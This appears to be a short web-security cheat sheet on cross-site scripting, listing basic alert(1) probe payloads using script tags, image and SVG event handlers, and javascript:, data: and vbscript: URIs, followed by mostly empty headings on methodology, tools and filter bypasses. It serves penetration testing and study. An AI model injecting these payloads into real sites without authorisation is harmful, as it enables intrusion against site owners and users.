Cross-Site Scripting (XSS)

Quick Payloads

Basic XSS

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<div onmouseover="alert(1)">Hover me</div>

Event Handlers

onclick=alert(1)
onmouseover=alert(1)
onerror=alert(1)
onload=alert(1)
onfocus=alert(1)
onblur=alert(1)

JavaScript Events

javascript:alert(1)
data:text/html,<script>alert(1)</script>
vbscript:alert(1)

DOM Based

Testing Methodology

1. Parameter Fuzzing

2. Common Test Points

3. Context Testing

Common Vulnerable Endpoints

Search Forms

Comment Sections

User Profiles

Tools & Commands

XSS Hunter

Custom Python Script

Common Bypass Techniques

WAF Bypass

Filter Bypass

References

Last updated

Was this helpful?